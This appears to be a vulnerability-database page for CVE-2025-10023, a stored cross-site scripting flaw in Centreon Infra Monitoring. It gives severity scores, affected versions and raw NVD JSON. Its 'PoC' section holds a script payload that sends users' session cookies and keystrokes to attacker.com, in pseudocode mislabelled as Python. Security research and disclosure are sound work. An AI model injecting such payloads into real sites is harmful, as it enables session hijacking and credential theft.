Security Vulnerability Report
中文
CVE-2025-10023 CVSS 6.2 MEDIUM

CVE-2025-10023

Published: 2025-10-27 16:15:35
Last Modified: 2026-01-26 14:02:33
Source: bd4443e6-1eef-43f3-9886-25fc9ceeaae7

Description

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (Services Meta-services modules) allows Stored XSS by users with elevated privileges.This issue affects Infra Monitoring: from 24.10.0 before 24.10.9, from 24.04.0 before 24.04.16, from 23.10.0 before 23.10.26.

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:centreon:centreon_web:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:centreon:centreon_web:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:centreon:centreon_web:*:*:*:*:*:*:*:* - VULNERABLE
Centreon Infra Monitoring 24.10.0 - 24.10.8
Centreon Infra Monitoring 24.04.0 - 24.04.15
Centreon Infra Monitoring 23.10.0 - 23.10.25

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-10023 Stored XSS PoC // Target: Centreon Infra Monitoring < 24.10.9, < 24.04.16, < 23.10.26 // Attack Vector: Inject malicious JavaScript through Services Meta-services module // Step 1: Authenticate as high-privilege user const session = authenticate('admin_user', 'password'); // Step 2: Navigate to Services Meta-services module goto('/centreon/main.php?p=60901'); // Step 3: Inject stored XSS payload in vulnerable field // Common vulnerable fields: service description, comment, notes const xssPayload = '<script>\n // Steal session cookies fetch("https://attacker.com/steal?cookie=" + encodeURIComponent(document.cookie)); // Or perform keylogging document.addEventListener("keypress", function(e) { fetch("https://attacker.com/log?key=" + e.key); }); </script>'; // Fill in the vulnerable input field fillInput('meta_service_description', xssPayload); fillInput('meta_service_comment', xssPayload); // Step 4: Submit the form click('submit_button'); // Step 5: When other users view the affected page, the XSS will execute // The malicious script runs in their browser context // Cleanup: Remove the injected payload after demonstration // deleteMetaService(meta_service_id);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10023", "sourceIdentifier": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "published": "2025-10-27T16:15:35.287", "lastModified": "2026-01-26T14:02:33.173", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (Services Meta-services modules) \n\nallows Stored XSS by users with elevated privileges.This issue affects Infra Monitoring: from 24.10.0 before 24.10.9, from 24.04.0 before 24.04.16, from 23.10.0 before 23.10.26."}], "metrics": {"cvssMetricV31": [{"source": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:centreon:centreon_web:*:*:*:*:*:*:*:*", "versionStartIncluding": "23.10.0", "versionEndExcluding": "23.10.26", "matchCriteriaId": "C26D15FD-EFFC-48FE-BC84-A518F91148DB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:centreon:centreon_web:*:*:*:*:*:*:*:*", "versionStartIncluding": "24.04.0", "versionEndExcluding": "24.04.16", "matchCriteriaId": "19652073-5857-4F6A-85E0-A2B35E36AA25"}, {"vulnerable": true, "criteria": "cpe:2.3:a:centreon:centreon_web:*:*:*:*:*:*:*:*", "versionStartIncluding": "24.10.0", "versionEndExcluding": "24.10.9", "matchCriteriaId": "F1E5A4E9-BADF-463F-9632-200EFFDC8F36"}]}]}], "references": [{"url": "https://github.com/centreon/centreon/releases", "source": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "tags": ["Release Notes"]}, {"url": "https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-10023-centreon-web-all-versions-medium-severity-5179", "source": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "tags": ["Patch", "Vendor Advisory"]}]}}